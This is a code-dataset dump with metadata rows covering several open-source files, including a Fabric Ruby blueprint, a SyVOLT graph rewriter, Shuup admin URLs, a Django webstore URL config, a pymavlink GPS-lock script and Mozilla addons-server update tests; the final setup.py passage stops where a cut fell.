repo_name
stringlengths 6
90
| path
stringlengths 4
230
| copies
stringlengths 1
4
| size
stringlengths 4
7
| content
stringlengths 734
985k
| license
stringclasses 15
values | hash
int64 -9,223,303,126,770,100,000
9,223,233,360B
| line_mean
float64 3.79
99.6
| line_max
int64 19
999
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
8.06
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
adisbladis/blues | blues/ruby.py | 3 | 1148 | """
Ruby Blueprint
==============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.ruby
settings:
ruby:
gems: # List of ruby gems to install (Optional)
# - sass
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['setup', 'configure']
blueprint = blueprints.get(__name__)
@task
def setup():
"""
Install Ruby and configured gems
"""
install()
configure()
@task
def configure():
"""
Install configured gems
"""
install_gems()
def install():
with sudo():
info('Installing Ruby v1.9.3')
debian.apt_get('install', 'ruby1.9.3')
info('Installing Bundler')
gem('install', 'bundler')
def install_gems():
gems = blueprint.get('gems', [])
if gems:
info('Installing Gems')
gem('install', *gems)
def gem(command, *options):
info('Running gem {}', command)
with sudo():
run('gem {} {} --no-ri --no-rdoc'.format(command, ' '.join(options)))
| mit | 2,994,391,823,487,653,000 | 15.882353 | 77 | 0.584495 | false | 3.447447 | false | false | false |
levilucio/SyVOLT | t_core/rewriter.py | 1 | 4539 |
from .rule_primitive import RulePrimitive
from .messages import TransformationException
from core.himesis import Himesis
from core.himesis_utils import update_equations
from solver.simple_attribute_equation_evaluator import is_consistent
import traceback
import re
class Rewriter(RulePrimitive):
'''
Transforms the matched source model elements according to the specified post-condition pattern.
'''
def __init__(self, condition):
'''
Transforms the bound graph of the source graph into what the specification of the post-condition pattern.
@param condition: The the post-condition pattern.
'''
super(Rewriter, self).__init__()
self.condition = condition
def __str__(self):
s = super(Rewriter, self).__str__()
s = s.split(' ')
s.insert(1, '[%s]' % self.condition.name)
return reduce(lambda x, y: x + ' ' + y, s)
def packet_in(self, packet, verbosity = 0):
self.exception = None
self.is_success = False
if self.condition.pre[Himesis.Constants.GUID] not in packet.match_sets:
self.is_success = False
# TODO: This should be a TransformationLanguageSpecificException
self.exception = TransformationException()
self.exception.packet = packet
return packet
else:
match = packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite
try:
mapping = match.to_label_mapping(packet.graph)
# Apply the transformation on the match
if verbosity > 0:
print("Rewriter mapping: " + str(mapping))
graph_eqs = packet.graph["equations"]
try:
cond_eqs = self.condition["equations"]
except KeyError:
cond_eqs = []
if cond_eqs and graph_eqs != cond_eqs:
#get dict from label to node num
RHS_labels = {}
for n, node in enumerate(self.condition.vs):
if node["MT_label__"] == '':
continue
RHS_labels[int(node["MT_label__"])] = n
new_mapping = {}
j=0
vcount = packet.graph.vcount()
#make sure to iterate in natural order
for label in sorted(RHS_labels.keys()):
#use mapping if possible
if str(label) in mapping:
new_mapping[label] = mapping[str(label)]
#assume nodes will be added in this order
#TODO: Handle deleted nodes
else:
new_mapping[label] = vcount + j
j += 1
new_cond_eqs = update_equations(cond_eqs, new_mapping)
packet.graph["equations"] += new_cond_eqs
if not is_consistent(packet.graph):
if verbosity >= 2:
print("Graph: " + packet.graph.name + " has inconsistent equations inside")
self.is_success = False
return packet
self.condition.execute(packet, mapping) # Sets dirty nodes as well
except Exception as e:
tb = traceback.format_exc()
print("Rewriter Error: " + str(e))
print(tb)
print("packet.graph: " + packet.graph.name)
print("self.condition: " + self.condition.name)
#raise
self.is_success = False
self.exception = TransformationException(e)
self.exception.packet = packet
self.exception.transformation_unit = self
return packet
# Remove the match
packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite = None
if len(packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].matches) == 0:
del packet.match_sets[self.condition.pre[Himesis.Constants.GUID]]
#print self.condition
self.is_success = True
return packet
| mit | -5,431,089,744,704,395,000 | 36.142857 | 117 | 0.50738 | false | 4.839019 | false | false | false |
suutari-ai/shoop | shuup/admin/modules/contact_groups/__init__.py | 3 | 2024 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2017, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shuup.admin.base import AdminModule, MenuEntry
from shuup.admin.menu import STOREFRONT_MENU_CATEGORY
from shuup.admin.utils.permissions import get_default_model_permissions
from shuup.admin.utils.urls import (
admin_url, derive_model_url, get_edit_and_list_urls
)
from shuup.core.models import ContactGroup
class ContactGroupModule(AdminModule):
name = _("Contact Groups")
breadcrumbs_menu_entry = MenuEntry(name, url="shuup_admin:contact_group.list")
def get_urls(self):
return [
admin_url(
"^contact_group/(?P<pk>\d+)/delete/$",
"shuup.admin.modules.contact_groups.views.ContactGroupDeleteView",
name="contact_group.delete",
permissions=["shuup.delete_contactgroup"],
)
] + get_edit_and_list_urls(
url_prefix="^contact_group",
view_template="shuup.admin.modules.contact_groups.views.ContactGroup%sView",
name_template="contact_group.%s",
permissions=get_default_model_permissions(ContactGroup),
)
def get_menu_entries(self, request):
return [
MenuEntry(
text=self.name,
icon="fa fa-asterisk",
url="shuup_admin:contact_group.list",
category=STOREFRONT_MENU_CATEGORY,
subcategory="other_settings",
ordering=2
),
]
def get_required_permissions(self):
return get_default_model_permissions(ContactGroup)
def get_model_url(self, object, kind):
return derive_model_url(ContactGroup, "shuup_admin:contact_group", object, kind)
| agpl-3.0 | -7,866,033,174,984,438,000 | 35.142857 | 88 | 0.64081 | false | 3.776119 | false | false | false |
brittdawn/django-webstore | webstore/urls.py | 2 | 3563 | """webstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from carts.views import CartView, ItemCountView, CheckoutView, CheckoutFinalView
from invoice.views import (
AddressSelectFormView,
UserAddressCreateView,
OrderList,
UserCheckoutAPI,
OrderDetail
)
from products.views import (
APIHomeView,
CategoryListAPIView,
CategoryRetrieveAPIView,
ProductListAPIView,
ProductRetrieveAPIView,
)
# =========================================================================
# Enabling RESTful architecture with dynamic urls.
# Overall url patterns for webstore.
# =========================================================================
urlpatterns = [
url(r'^$', 'subscribers.views.home', name='home'),
url(r'^about/$', 'webstore.views.about', name='about'),
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include('registration.backends.default.urls')),
url(r'^products/', include('products.urls')),
url(r'^categories/', include('products.urls_categories')),
url(r'^orders/$', OrderList.as_view(), name='orders'),
url(r'^orders/(?P<pk>\d+)/$', OrderDetail.as_view(), name='order_detail'),
url(r'^cart/$', CartView.as_view(), name='cart'),
url(r'^cart/count/$', ItemCountView.as_view(), name='item_count'),
url(r'^checkout/$', CheckoutView.as_view(), name='checkout'),
url(r'^checkout/address/$', AddressSelectFormView.as_view(), name='checkout_address'),
url(r'^checkout/address/add/$', UserAddressCreateView.as_view(), name='user_address_create'),
url(r'^checkout/final/$', CheckoutFinalView.as_view(), name='checkout_final'),
url(r'^docs/', include('rest_framework_docs.urls')),
]
#API Patterns
urlpatterns += [
url(r'^api/$', APIHomeView.as_view(), name='home_api'),
url(r'^api/auth/token/$', 'rest_framework_jwt.views.obtain_jwt_token'),
url(r'^api/auth/token/refresh$', 'rest_framework_jwt.views.refresh_jwt_token'),
url(r'^api/categories/$', CategoryListAPIView.as_view(), name='categories_api'),
url(r'^api/categories/(?P<pk>\d+)/$', CategoryRetrieveAPIView.as_view(), name='category_detail_api'),
url(r'^api/products/$', ProductListAPIView.as_view(), name='products_api'),
url(r'^api/products/(?P<pk>\d+)/$', ProductRetrieveAPIView.as_view(), name='product_detail_api'),
url(r'^api/user/checkout/$', UserCheckoutAPI.as_view(), name='user_checkout_api'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| mit | -7,629,831,077,194,379,000 | 48.486111 | 105 | 0.616896 | false | 3.898249 | false | false | false |
TheMrNomis/mavlink | pymavlink/tools/mavgpslock.py | 47 | 2056 | #!/usr/bin/env python
'''
show GPS lock events in a MAVLink log
'''
import sys, time, os
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("--condition", default=None, help="condition for packets")
parser.add_argument("logs", metavar="LOG", nargs="+")
args = parser.parse_args()
from pymavlink import mavutil
def lock_time(logfile):
'''work out gps lock times for a log file'''
print("Processing log %s" % filename)
mlog = mavutil.mavlink_connection(filename)
locked = False
start_time = 0.0
total_time = 0.0
t = None
m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition)
if m is None:
return 0
unlock_time = time.mktime(time.localtime(m._timestamp))
while True:
m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition)
if m is None:
if locked:
total_time += time.mktime(t) - start_time
if total_time > 0:
print("Lock time : %u:%02u" % (int(total_time)/60, int(total_time)%60))
return total_time
t = time.localtime(m._timestamp)
if m.fix_type >= 2 and not locked:
print("Locked at %s after %u seconds" % (time.asctime(t),
time.mktime(t) - unlock_time))
locked = True
start_time = time.mktime(t)
elif m.fix_type == 1 and locked:
print("Lost GPS lock at %s" % time.asctime(t))
locked = False
total_time += time.mktime(t) - start_time
unlock_time = time.mktime(t)
elif m.fix_type == 0 and locked:
print("Lost protocol lock at %s" % time.asctime(t))
locked = False
total_time += time.mktime(t) - start_time
unlock_time = time.mktime(t)
return total_time
total = 0.0
for filename in args.logs:
total += lock_time(filename)
print("Total time locked: %u:%02u" % (int(total)/60, int(total)%60))
| lgpl-3.0 | -8,487,313,588,117,863,000 | 31.125 | 87 | 0.578794 | false | 3.607018 | false | false | false |
kumar303/addons-server | src/olympia/addons/tests/test_update.py | 2 | 26966 | # -*- coding: utf-8 -*-
import json
from unittest import mock
from datetime import datetime, timedelta
from email import utils
from django.db import connection
from services import update
from olympia import amo
from olympia.addons.models import (
Addon, CompatOverride, CompatOverrideRange, IncompatibleVersions)
from olympia.amo.tests import TestCase
from olympia.applications.models import AppVersion
from olympia.files.models import File
from olympia.versions.models import ApplicationsVersions, Version
class VersionCheckMixin(object):
def get_update_instance(self, data):
instance = update.Update(data)
instance.cursor = connection.cursor()
return instance
class TestDataValidate(VersionCheckMixin, TestCase):
fixtures = ['base/addon_3615', 'base/appversion']
def setUp(self):
super(TestDataValidate, self).setUp()
self.data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
def test_app_os(self):
data = self.data.copy()
data['appOS'] = 'something %s penguin' % amo.PLATFORM_LINUX.api_name
instance = self.get_update_instance(data)
assert instance.is_valid()
assert instance.data['appOS'] == amo.PLATFORM_LINUX.id
def test_app_version_fails(self):
data = self.data.copy()
del data['appID']
instance = self.get_update_instance(data)
assert not instance.is_valid()
def test_app_version_wrong(self):
data = self.data.copy()
data['appVersion'] = '67.7'
instance = self.get_update_instance(data)
# If you pass through the wrong version that's fine
# you will just end up with no updates because your
# version_int will be out.
assert instance.is_valid()
def test_app_version(self):
data = self.data.copy()
instance = self.get_update_instance(data)
assert instance.is_valid()
assert instance.data['version_int'] == 3070000001000
def test_sql_injection(self):
data = self.data.copy()
data['id'] = "'"
instance = self.get_update_instance(data)
assert not instance.is_valid()
def test_inactive(self):
addon = Addon.objects.get(pk=3615)
addon.update(disabled_by_user=True)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_soft_deleted(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DELETED)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_disabled(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DISABLED)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_no_version(self):
data = self.data.copy()
del data['version']
instance = self.get_update_instance(data)
assert instance.is_valid()
def test_unlisted_addon(self):
"""Add-ons with only unlisted versions are valid, they just don't
receive any updates (See TestLookinstance.test_no_unlisted below)."""
addon = Addon.objects.get(pk=3615)
self.make_addon_unlisted(addon)
instance = self.get_update_instance(self.data)
assert instance.is_valid()
class TestLookup(VersionCheckMixin, TestCase):
fixtures = ['addons/update', 'base/appversion']
def setUp(self):
super(TestLookup, self).setUp()
self.addon = Addon.objects.get(id=1865)
self.platform = None
self.version_int = 3069900200100
self.app = amo.APP_IDS[1]
self.version_1_0_2 = 66463
self.version_1_1_3 = 90149
self.version_1_2_0 = 105387
self.version_1_2_1 = 112396
self.version_1_2_2 = 115509
def get_update_instance(self, *args):
data = {
'id': self.addon.guid,
'appID': args[2].guid,
'appVersion': 1, # this is going to be overridden
'appOS': args[3].api_name if args[3] else '',
'reqVersion': '',
}
# Allow version to be optional.
if args[0]:
data['version'] = args[0]
instance = super(TestLookup, self).get_update_instance(data)
assert instance.is_valid()
instance.data['version_int'] = args[1]
instance.get_update()
return (instance.data['row'].get('version_id'),
instance.data['row'].get('file_id'))
def change_status(self, version, status):
version = Version.objects.get(pk=version)
file = version.files.all()[0]
file.status = status
file.save()
return version
def change_version(self, version, name):
Version.objects.get(pk=version).update(version=name)
def test_low_client(self):
"""
Version 3.0a1 of Firefox is 3000000001100 and version 1.0.2 of the
add-on is returned.
"""
version, file = self.get_update_instance(
'', '3000000001100', self.app, self.platform)
assert version == self.version_1_0_2
def test_new_client(self):
"""
Version 3.0.12 of Firefox is 3069900200100 and version 1.2.2 of the
add-on is returned.
"""
version, file = self.get_update_instance(
'', self.version_int, self.app, self.platform)
assert version == self.version_1_2_2
def test_min_client(self):
"""
Version 3.7a5pre of Firefox is 3070000005000 and version 1.1.3 of
the add-on is returned, because all later ones are set to minimum
version of 3.7a5.
"""
for version in Version.objects.filter(pk__gte=self.version_1_2_0):
appversion = version.apps.all()[0]
appversion.min = AppVersion.objects.get(pk=325) # 3.7a5
appversion.save()
version, file = self.get_update_instance(
'', '3070000005000', self.app, self.platform) # 3.7a5pre
assert version == self.version_1_1_3
def test_new_client_ordering(self):
"""
Given the following:
* Version 15 (1 day old), max application_version 3.6*
* Version 12 (1 month old), max application_version 3.7a
We want version 15, even though version 12 is for a higher version.
This was found in https://bugzilla.mozilla.org/show_bug.cgi?id=615641.
"""
application_version = ApplicationsVersions.objects.get(pk=77550)
application_version.max_id = 350
application_version.save()
# Version 1.2.2 is now a lower max version.
application_version = ApplicationsVersions.objects.get(pk=88490)
application_version.max_id = 329
application_version.save()
version, file = self.get_update_instance(
'', self.version_int, self.app, self.platform)
assert version == self.version_1_2_2
def test_public(self):
"""
If the addon status is public then you get a public version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.addon.reload()
assert self.addon.status == amo.STATUS_APPROVED
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_no_unlisted(self):
"""
Unlisted versions are always ignored, never served as updates.
"""
Version.objects.get(pk=self.version_1_2_2).update(
channel=amo.RELEASE_CHANNEL_UNLISTED)
self.addon.reload()
assert self.addon.status == amo.STATUS_APPROVED
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_can_downgrade(self):
"""
Check that we can downgrade, if 1.2.0 gets admin disabled
and the oldest public version is now 1.1.3.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
for v in Version.objects.filter(pk__gte=self.version_1_2_1):
v.delete()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_1_3
def test_public_pending_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for something public.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_public_pending_no_file_beta(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. If there are no files,
find a public version.
"""
self.change_version(self.version_1_2_0, '1.2beta')
Version.objects.get(pk=self.version_1_2_0).files.all().delete()
version, file = self.get_update_instance(
'1.2beta', self.version_int, self.app, self.platform)
dest = Version.objects.get(pk=self.version_1_2_2)
assert dest.addon.status == amo.STATUS_APPROVED
assert dest.files.all()[0].status == amo.STATUS_APPROVED
assert version == dest.pk
def test_not_public(self):
"""
If the addon status is not public, then the update only
looks for files within that one version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_NULL)
self.addon.update(status=amo.STATUS_NULL)
version, file = self.get_update_instance(
'1.2.1', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_platform_does_not_exist(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_platform_exists(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_LINUX)
assert version == self.version_1_2_2
def test_file_for_platform(self):
"""If client passes a platform, make sure we get the right file."""
version = Version.objects.get(pk=self.version_1_2_2)
file_one = version.files.all()[0]
file_one.platform = amo.PLATFORM_LINUX.id
file_one.save()
file_two = File(version=version, filename='foo', hash='bar',
platform=amo.PLATFORM_WIN.id,
status=amo.STATUS_APPROVED)
file_two.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_LINUX)
assert version == self.version_1_2_2
assert file == file_one.pk
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_WIN)
assert version == self.version_1_2_2
assert file == file_two.pk
class TestDefaultToCompat(VersionCheckMixin, TestCase):
"""
Test default to compatible with all the various combinations of input.
"""
fixtures = ['addons/default-to-compat']
def setUp(self):
super(TestDefaultToCompat, self).setUp()
self.addon = Addon.objects.get(id=337203)
self.platform = None
self.app = amo.APP_IDS[1]
self.app_version_int_3_0 = 3000000200100
self.app_version_int_4_0 = 4000000200100
self.app_version_int_5_0 = 5000000200100
self.app_version_int_6_0 = 6000000200100
self.app_version_int_7_0 = 7000000200100
self.app_version_int_8_0 = 8000000200100
self.ver_1_0 = 1268881
self.ver_1_1 = 1268882
self.ver_1_2 = 1268883
self.ver_1_3 = 1268884
self.expected = {
'3.0-strict': None, '3.0-normal': None, '3.0-ignore': None,
'4.0-strict': self.ver_1_0,
'4.0-normal': self.ver_1_0,
'4.0-ignore': self.ver_1_0,
'5.0-strict': self.ver_1_2,
'5.0-normal': self.ver_1_2,
'5.0-ignore': self.ver_1_2,
'6.0-strict': self.ver_1_3,
'6.0-normal': self.ver_1_3,
'6.0-ignore': self.ver_1_3,
'7.0-strict': self.ver_1_3,
'7.0-normal': self.ver_1_3,
'7.0-ignore': self.ver_1_3,
'8.0-strict': None,
'8.0-normal': self.ver_1_3,
'8.0-ignore': self.ver_1_3,
}
def create_override(self, **kw):
co = CompatOverride.objects.create(
name='test', guid=self.addon.guid, addon=self.addon
)
default = dict(compat=co, app=self.app.id, min_version='0',
max_version='*', min_app_version='0',
max_app_version='*')
default.update(kw)
CompatOverrideRange.objects.create(**default)
def update_files(self, **kw):
for version in self.addon.versions.all():
for file in version.files.all():
file.update(**kw)
def get_update_instance(self, **kw):
instance = super(TestDefaultToCompat, self).get_update_instance({
'reqVersion': 1,
'id': self.addon.guid,
'version': kw.get('item_version', '1.0'),
'appID': self.app.guid,
'appVersion': kw.get('app_version', '3.0'),
})
assert instance.is_valid()
instance.compat_mode = kw.get('compat_mode', 'strict')
instance.get_update()
return instance.data['row'].get('version_id')
def check(self, expected):
"""
Checks Firefox versions 3.0 to 8.0 in each compat mode and compares it
to the expected version.
"""
versions = ['3.0', '4.0', '5.0', '6.0', '7.0', '8.0']
modes = ['strict', 'normal', 'ignore']
for version in versions:
for mode in modes:
assert (
self.get_update_instance(
app_version=version, compat_mode=mode) ==
expected['-'.join([version, mode])]
)
def test_application(self):
# Basic test making sure application() is returning the output of
# Update.get_output(). Have to mock Update(): otherwise, the real
# database would be hit, not the test one, because of how services
# use a different setting and database connection APIs.
environ = {
'QUERY_STRING': ''
}
self.start_response_call_count = 0
expected_headers = [
('FakeHeader', 'FakeHeaderValue')
]
expected_output = b'{"fake": "output"}'
def start_response_inspector(status, headers):
self.start_response_call_count += 1
assert status == '200 OK'
assert headers == expected_headers
with mock.patch('services.update.Update') as UpdateMock:
update_instance = UpdateMock.return_value
update_instance.get_headers.return_value = expected_headers
update_instance.get_output.return_value = expected_output
output = update.application(environ, start_response_inspector)
assert self.start_response_call_count == 1
# Output is an array with a single string containing the body of the
# response.
assert output == [expected_output]
def test_baseline(self):
# Tests simple add-on (non-binary-components, non-strict).
self.check(self.expected)
def test_binary_components(self):
# Tests add-on with binary_components flag.
self.update_files(binary_components=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_extension_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
def test_binary_component_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.update_files(binary_components=True)
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': None,
})
self.check(self.expected)
def test_strict_opt_in(self):
# Tests add-on with opt-in strict compatibility
self.update_files(strict_compatibility=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_max_addon_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a max wildcard.
self.create_override(min_version='1.2', max_version='1.3',
min_app_version='5.0', max_app_version='6.*')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_max_app_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a min/max wildcard for the app.
self.create_override(min_version='1.2', max_version='1.3')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
'7.0-normal': self.ver_1_1,
'8.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_both_wildcards(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a wildcard for both addon version and app
# version.
self.create_override(min_app_version='7.0', max_app_version='*')
self.expected.update({
'7.0-normal': None,
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_invalid_version(self):
# Tests compat override range where version doesn't match our
# versioning scheme. This results in no versions being written to the
# incompatible_versions table.
self.create_override(min_version='ver1', max_version='ver2')
assert IncompatibleVersions.objects.all().count() == 0
def test_min_max_version(self):
# Tests the minimum requirement of the app maxVersion.
av = self.addon.current_version.apps.all()[0]
av.min_id = 233 # Firefox 3.0.
av.max_id = 268 # Firefox 3.5.
av.save()
self.expected.update({
'3.0-strict': self.ver_1_3,
'3.0-ignore': self.ver_1_3,
'4.0-ignore': self.ver_1_3,
'5.0-ignore': self.ver_1_3,
'6.0-strict': self.ver_1_2,
'6.0-normal': self.ver_1_2,
'7.0-strict': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
class TestResponse(VersionCheckMixin, TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestResponse, self).setUp()
self.addon_one = Addon.objects.get(pk=3615)
self.data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
self.mac = amo.PLATFORM_MAC
self.win = amo.PLATFORM_WIN
def test_bad_guid(self):
self.data['id'] = 'garbage'
instance = self.get_update_instance(self.data)
assert json.loads(instance.get_output()) == instance.get_error_output()
def test_no_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
data = self.data.copy()
data['appOS'] = self.win.api_name
instance = self.get_update_instance(data)
assert instance.get_output()
assert instance.data['row']['file_id'] == file.pk
data['appOS'] = self.mac.api_name
instance = self.get_update_instance(data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
def test_different_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
file_pk = file.pk
file.id = None
file.platform = self.mac.id
file.save()
mac_file_pk = file.pk
data = self.data.copy()
data['appOS'] = self.win.api_name
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['file_id'] == file_pk
data['appOS'] = self.mac.api_name
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['file_id'] == mac_file_pk
def test_good_version(self):
instance = self.get_update_instance(self.data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['hash'].startswith('sha256:3808b13e')
assert instance.data['row']['min'] == '2.0'
assert instance.data['row']['max'] == '4.0'
def test_no_app_version(self):
data = self.data.copy()
data['appVersion'] = '1.4'
instance = self.get_update_instance(data)
instance.is_valid()
assert not instance.get_update()
def test_low_app_version(self):
data = self.data.copy()
data['appVersion'] = '2.0'
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['hash'].startswith('sha256:3808b13e')
assert instance.data['row']['min'] == '2.0'
assert instance.data['row']['max'] == '4.0'
def test_content_type(self):
instance = self.get_update_instance(self.data)
('Content-Type', 'text/xml') in instance.get_headers(1)
def test_cache_control(self):
instance = self.get_update_instance(self.data)
('Cache-Control', 'public, max-age=3600') in instance.get_headers(1)
def test_length(self):
instance = self.get_update_instance(self.data)
('Cache-Length', '1') in instance.get_headers(1)
def test_expires(self):
"""Check there are these headers and that expires is 3600 later."""
# We aren't bother going to test the actual time in expires, that
# way lies pain with broken tests later.
instance = self.get_update_instance(self.data)
headers = dict(instance.get_headers(1))
last_modified = datetime(
*utils.parsedate_tz(headers['Last-Modified'])[:7])
expires = datetime(*utils.parsedate_tz(headers['Expires'])[:7])
assert (expires - last_modified).seconds == 3600
def get_file_url(self):
"""Return the file url with the hash as parameter."""
return (
'http://testserver/user-media/addons/3615/'
'delicious_bookmarks-2.1.072-fx.xpi?'
'filehash=sha256%3A3808b13ef8341378b9c8305ca648200954ee7dcd8dc'
'e09fef55f2673458bc31f')
def test_url(self):
instance = self.get_update_instance(self.data)
instance.get_output()
assert instance.data['row']['url'] == self.get_file_url()
def test_url_local_recent(self):
a_bit_ago = datetime.now() - timedelta(seconds=60)
File.objects.get(pk=67442).update(datestatuschanged=a_bit_ago)
instance = self.get_update_instance(self.data)
instance.get_output()
assert instance.data['row']['url'] == self.get_file_url()
def test_hash(self):
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
file = File.objects.get(pk=67442)
guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
assert data['addons'][guid]['updates'][0]['update_hash'] == file.hash
file = File.objects.get(pk=67442)
file.hash = ''
file.save()
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
assert 'update_hash' not in data['addons'][guid]['updates'][0]
def test_release_notes(self):
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
assert data['addons'][guid]['updates'][0]['update_info_url']
version = Version.objects.get(pk=81551)
version.update(release_notes=None)
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
assert 'update_info_url' not in data['addons'][guid]['updates'][0]
def test_no_updates_at_all(self):
self.addon_one.versions.all().delete()
instance = self.get_update_instance(self.data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
def test_no_updates_my_fx(self):
data = self.data.copy()
data['appVersion'] = '5.0.1'
instance = self.get_update_instance(data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
| bsd-3-clause | -3,774,008,587,513,542,700 | 35.939726 | 79 | 0.59334 | false | 3.565045 | true | false | false |
monetizeio/dj-user | setup.py | 1 | 2096 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2013 by its contributors. See AUTHORS for details.
# Distributed under the MIT/X11 software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from distutils.core import setup
from dj_user import get_version
# Compile the list of packages available, because distutils doesn't have an
# easy way to do this.
import os
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('dj_user'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
